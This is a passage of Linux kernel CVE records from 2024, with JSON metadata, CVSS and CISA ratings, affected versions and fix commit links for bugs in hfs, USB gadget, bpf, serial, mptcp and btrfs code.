___slab_alloc+0x16b5/0x3970 mm/slub.c:3540\n __slab_alloc mm/slub.c:3625 [inline]\n __slab_alloc_node mm/slub.c:3678 [inline]\n slab_alloc_node mm/slub.c:3850 [inline]\n kmem_cache_alloc_lru+0x64d/0xb30 mm/slub.c:3879\n alloc_inode_sb include/linux/fs.h:3018 [inline]\n hfs_alloc_inode+0x5a/0xc0 fs/hfs/super.c:165\n alloc_inode+0x83/0x440 fs/inode.c:260\n new_inode_pseudo fs/inode.c:1005 [inline]\n new_inode+0x38/0x4f0 fs/inode.c:1031\n hfs_new_inode+0x61/0x1010 fs/hfs/inode.c:186\n hfs_mkdir+0x54/0x250 fs/hfs/dir.c:228\n vfs_mkdir+0x49a/0x700 fs/namei.c:4126\n do_mkdirat+0x529/0x810 fs/namei.c:4149\n __do_sys_mkdirat fs/namei.c:4164 [inline]\n __se_sys_mkdirat fs/namei.c:4162 [inline]\n __x64_sys_mkdirat+0xc8/0x120 fs/namei.c:4162\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nIt missed to initialize .tz_secondswest, .cached_start and .cached_blocks\nfields in struct hfs_inode_info after hfs_alloc_inode(), fix it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T11:37:36.675Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f7316b2b2f11cf0c6de917beee8d3de728be24db"
        },
        {
          "url": "https://git.kernel.org/stable/c/4a52861cd76e79f1a593beb23d096523eb9732c2"
        },
        {
          "url": "https://git.kernel.org/stable/c/10f7163bfb5f8b4e0c9c05a939f20b8540e33c65"
        },
        {
          "url": "https://git.kernel.org/stable/c/d55aae5c1730d6b70d5d8eaff00113cd34772ea3"
        },
        {
          "url": "https://git.kernel.org/stable/c/58d83fc160505a7009c39dec64effaac5129b971"
        },
        {
          "url": "https://git.kernel.org/stable/c/9c4e40b9b731220f9464975e49da75496e3865c4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3493d6f0dfb1ab5225b62faa77732983f2187a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/26a2ed107929a855155429b11e1293b83e6b2a8b"
        }
      ],
      "title": "hfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42311",
    "datePublished": "2024-08-17T09:09:15.793Z",
    "dateReserved": "2024-07-30T07:40:12.277Z",
    "dateUpdated": "2026-01-05T11:37:36.675Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-25741 (GCVE-0-2024-25741)

Vulnerability from cvelistv5 – Published: 2024-02-12 00:00 – Updated: 2025-11-03 21:54

Summary

printer_write in drivers/usb/gadget/function/f_printer.c in the Linux kernel through 6.7.4 does not properly call usb_ep_queue, which might allow attackers to cause a denial of service or have unspecified other impact.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

n/a

Assigner

mitre

References

URL

Tags

https://www.spinics.net/lists/linux-usb/msg252167.html

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-25741",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-12T15:54:02.418294Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-703",
                "description": "CWE-703 Improper Check or Handling of Exceptional Conditions",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-13T13:29:21.834Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:54:05.600Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.spinics.net/lists/linux-usb/msg252167.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "printer_write in drivers/usb/gadget/function/f_printer.c in the Linux kernel through 6.7.4 does not properly call usb_ep_queue, which might allow attackers to cause a denial of service or have unspecified other impact."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-02-12T02:15:20.912Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.spinics.net/lists/linux-usb/msg252167.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-25741",
    "datePublished": "2024-02-12T00:00:00.000Z",
    "dateReserved": "2024-02-12T00:00:00.000Z",
    "dateUpdated": "2025-11-03T21:54:05.600Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42067 (GCVE-0-2024-42067)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2026-01-05 10:51

Title

bpf: Take return from set_memory_rox() into account with bpf_jit_binary_lock_ro()

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Take return from set_memory_rox() into account with bpf_jit_binary_lock_ro() set_memory_rox() can fail, leaving memory unprotected. Check return and bail out when bpf_jit_binary_lock_ro() returns an error.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/044da7ae7afd4ef60…
	https://git.kernel.org/stable/c/e60adf513275c3a38…

Impacted products

Vendor

Product

Version

Linux

Affected: d48567c9a0d1e605639f8a8705a61bbb55fb4e84 , < 044da7ae7afd4ef60806d73654a2e6a79aa4ed7a (git)
Affected: d48567c9a0d1e605639f8a8705a61bbb55fb4e84 , < e60adf513275c3a38e5cb67f7fd12387e43a3ff5 (git)

Linux

Affected: 6.2
Unaffected: 0 , < 6.2 (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:31.321Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/08f6c05feb1db21653e98ca84ea04ca032d014c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9fef36cad60d4226f9d06953cd56d1d2f9119730"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/044da7ae7afd4ef60806d73654a2e6a79aa4ed7a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e60adf513275c3a38e5cb67f7fd12387e43a3ff5"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42067",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:56.137791Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:58.173Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/arm/net/bpf_jit_32.c",
            "arch/loongarch/net/bpf_jit.c",
            "arch/mips/net/bpf_jit_comp.c",
            "arch/parisc/net/bpf_jit_core.c",
            "arch/s390/net/bpf_jit_comp.c",
            "arch/sparc/net/bpf_jit_comp_64.c",
            "arch/x86/net/bpf_jit_comp32.c",
            "include/linux/filter.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "044da7ae7afd4ef60806d73654a2e6a79aa4ed7a",
              "status": "affected",
              "version": "d48567c9a0d1e605639f8a8705a61bbb55fb4e84",
              "versionType": "git"
            },
            {
              "lessThan": "e60adf513275c3a38e5cb67f7fd12387e43a3ff5",
              "status": "affected",
              "version": "d48567c9a0d1e605639f8a8705a61bbb55fb4e84",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/arm/net/bpf_jit_32.c",
            "arch/loongarch/net/bpf_jit.c",
            "arch/mips/net/bpf_jit_comp.c",
            "arch/parisc/net/bpf_jit_core.c",
            "arch/s390/net/bpf_jit_comp.c",
            "arch/sparc/net/bpf_jit_comp_64.c",
            "arch/x86/net/bpf_jit_comp32.c",
            "include/linux/filter.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.2"
            },
            {
              "lessThan": "6.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Take return from set_memory_rox() into account with bpf_jit_binary_lock_ro()\n\nset_memory_rox() can fail, leaving memory unprotected.\n\nCheck return and bail out when bpf_jit_binary_lock_ro() returns\nan error."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:35.106Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/044da7ae7afd4ef60806d73654a2e6a79aa4ed7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e60adf513275c3a38e5cb67f7fd12387e43a3ff5"
        }
      ],
      "title": "bpf: Take return from set_memory_rox() into account with bpf_jit_binary_lock_ro()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42067",
    "datePublished": "2024-07-29T15:52:31.825Z",
    "dateReserved": "2024-07-29T15:50:41.168Z",
    "dateUpdated": "2026-01-05T10:51:35.106Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42248 (GCVE-0-2024-42248)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-05-04 09:25

Title

tty: serial: ma35d1: Add a NULL check for of_node

Summary

In the Linux kernel, the following vulnerability has been resolved: tty: serial: ma35d1: Add a NULL check for of_node The pdev->dev.of_node can be NULL if the "serial" node is absent. Add a NULL check to return an error in such cases.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/23efa74cfe6eb923a…
	https://git.kernel.org/stable/c/0e0e15ab2d3a094a3…
	https://git.kernel.org/stable/c/acd09ac253b5de8fd…

Impacted products

Vendor

Product

Version

Linux

Affected: 930cbf92db0184e327293d5e7089be0b08d46371 , < 23efa74cfe6eb923abb5b9bc51b2a04879013c67 (git)
Affected: 930cbf92db0184e327293d5e7089be0b08d46371 , < 0e0e15ab2d3a094a38525d23c03d78ec7d14a40e (git)
Affected: 930cbf92db0184e327293d5e7089be0b08d46371 , < acd09ac253b5de8fd79fc61a482ee19154914c7a (git)

Linux

Affected: 6.5
Unaffected: 0 , < 6.5 (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42248",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:25.362404Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:30.897Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/ma35d1_serial.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "23efa74cfe6eb923abb5b9bc51b2a04879013c67",
              "status": "affected",
              "version": "930cbf92db0184e327293d5e7089be0b08d46371",
              "versionType": "git"
            },
            {
              "lessThan": "0e0e15ab2d3a094a38525d23c03d78ec7d14a40e",
              "status": "affected",
              "version": "930cbf92db0184e327293d5e7089be0b08d46371",
              "versionType": "git"
            },
            {
              "lessThan": "acd09ac253b5de8fd79fc61a482ee19154914c7a",
              "status": "affected",
              "version": "930cbf92db0184e327293d5e7089be0b08d46371",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/ma35d1_serial.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.5"
            },
            {
              "lessThan": "6.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: ma35d1: Add a NULL check for of_node\n\nThe pdev-\u003edev.of_node can be NULL if the \"serial\" node is absent.\nAdd a NULL check to return an error in such cases."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:02.743Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/23efa74cfe6eb923abb5b9bc51b2a04879013c67"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e0e15ab2d3a094a38525d23c03d78ec7d14a40e"
        },
        {
          "url": "https://git.kernel.org/stable/c/acd09ac253b5de8fd79fc61a482ee19154914c7a"
        }
      ],
      "title": "tty: serial: ma35d1: Add a NULL check for of_node",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42248",
    "datePublished": "2024-08-07T15:14:32.830Z",
    "dateReserved": "2024-07-30T07:40:12.254Z",
    "dateUpdated": "2025-05-04T09:25:02.743Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44974 (GCVE-0-2024-44974)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

mptcp: pm: avoid possible UaF when selecting endp

Summary

In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: avoid possible UaF when selecting endp select_local_address() and select_signal_address() both select an endpoint entry from the list inside an RCU protected section, but return a reference to it, to be read later on. If the entry is dereferenced after the RCU unlock, reading info could cause a Use-after-Free. A simple solution is to copy the required info while inside the RCU protected section to avoid any risk of UaF later. The address ID might need to be modified later to handle the ID0 case later, so a copy seems OK to deal with.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ddee5b4b6a1cc03c1…
	https://git.kernel.org/stable/c/f2c865e9e3ca44fc0…
	https://git.kernel.org/stable/c/2b4f46f9503633dad…
	https://git.kernel.org/stable/c/9a9afbbc3fbfca497…
	https://git.kernel.org/stable/c/0201d65d9806d287a…
	https://git.kernel.org/stable/c/48e50dcbcbaaf713d…

Impacted products

Vendor

Product

Version

Linux

Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < ddee5b4b6a1cc03c1e9921cf34382e094c2009f1 (git)
Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < f2c865e9e3ca44fc06b5f73b29a954775e4dbb38 (git)
Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < 2b4f46f9503633dade75cb796dd1949d0e6581a1 (git)
Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < 9a9afbbc3fbfca4975eea4aa5b18556db5a0c0b8 (git)
Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < 0201d65d9806d287a00e0ba96f0321835631f63f (git)
Affected: 01cacb00b35cb62b139f07d5f84bcf0eeda8eff6 , < 48e50dcbcbaaf713d82bf2da5c16aeced94ad07d (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44974",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:26:21.490934Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:14.917Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:27.070Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/pm_netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ddee5b4b6a1cc03c1e9921cf34382e094c2009f1",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            },
            {
              "lessThan": "f2c865e9e3ca44fc06b5f73b29a954775e4dbb38",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            },
            {
              "lessThan": "2b4f46f9503633dade75cb796dd1949d0e6581a1",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            },
            {
              "lessThan": "9a9afbbc3fbfca4975eea4aa5b18556db5a0c0b8",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            },
            {
              "lessThan": "0201d65d9806d287a00e0ba96f0321835631f63f",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            },
            {
              "lessThan": "48e50dcbcbaaf713d82bf2da5c16aeced94ad07d",
              "status": "affected",
              "version": "01cacb00b35cb62b139f07d5f84bcf0eeda8eff6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/pm_netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: pm: avoid possible UaF when selecting endp\n\nselect_local_address() and select_signal_address() both select an\nendpoint entry from the list inside an RCU protected section, but return\na reference to it, to be read later on. If the entry is dereferenced\nafter the RCU unlock, reading info could cause a Use-after-Free.\n\nA simple solution is to copy the required info while inside the RCU\nprotected section to avoid any risk of UaF later. The address ID might\nneed to be modified later to handle the ID0 case later, so a copy seems\nOK to deal with."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:07.102Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ddee5b4b6a1cc03c1e9921cf34382e094c2009f1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f2c865e9e3ca44fc06b5f73b29a954775e4dbb38"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b4f46f9503633dade75cb796dd1949d0e6581a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a9afbbc3fbfca4975eea4aa5b18556db5a0c0b8"
        },
        {
          "url": "https://git.kernel.org/stable/c/0201d65d9806d287a00e0ba96f0321835631f63f"
        },
        {
          "url": "https://git.kernel.org/stable/c/48e50dcbcbaaf713d82bf2da5c16aeced94ad07d"
        }
      ],
      "title": "mptcp: pm: avoid possible UaF when selecting endp",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44974",
    "datePublished": "2024-09-04T19:54:26.917Z",
    "dateReserved": "2024-08-21T05:34:56.669Z",
    "dateUpdated": "2025-11-03T22:14:27.070Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41067 (GCVE-0-2024-41067)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2026-01-05 10:37

Title

btrfs: scrub: handle RST lookup error correctly

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: scrub: handle RST lookup error correctly [BUG] When running btrfs/060 with forced RST feature, it would crash the following ASSERT() inside scrub_read_endio(): ASSERT(sector_nr < stripe->nr_sectors); Before that, we would have tree dump from btrfs_get_raid_extent_offset(), as we failed to find the RST entry for the range. [CAUSE] Inside scrub_submit_extent_sector_read() every time we allocated a new bbio we immediately called btrfs_map_block() to make sure there was some RST range covering the scrub target. But if btrfs_map_block() fails, we immediately call endio for the bbio, while the bbio is newly allocated, it's completely empty. Then inside scrub_read_endio(), we go through the bvecs to find the sector number (as bi_sector is no longer reliable if the bio is submitted to lower layers). And since the bio is empty, such bvecs iteration would not find any sector matching the sector, and return sector_nr == stripe->nr_sectors, triggering the ASSERT(). [FIX] Instead of calling btrfs_map_block() after allocating a new bbio, call btrfs_map_block() first. Since our only objective of calling btrfs_map_block() is only to update stripe_len, there is really no need to do that after btrfs_alloc_bio(). This new timing would avoid the problem of handling empty bbio completely, and in fact fixes a possible race window for the old code, where if the submission thread is the only owner of the pending_io, the scrub would never finish (since we didn't decrease the pending_io counter). Although the root cause of RST lookup failure still needs to be addressed.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/17d1fd302a53d7e45…
	https://git.kernel.org/stable/c/2c49908634a2b97b1…

Impacted products

Vendor

Product

Version

Linux

Affected: 9acaa64187f9b4cbb75622883c96ea1a893d5431 , < 17d1fd302a53d7e456a7412da74be74a0cf63a72 (git)
Affected: 9acaa64187f9b4cbb75622883c96ea1a893d5431 , < 2c49908634a2b97b1c3abe0589be2739ac5e7fd5 (git)

Linux

Affected: 6.7
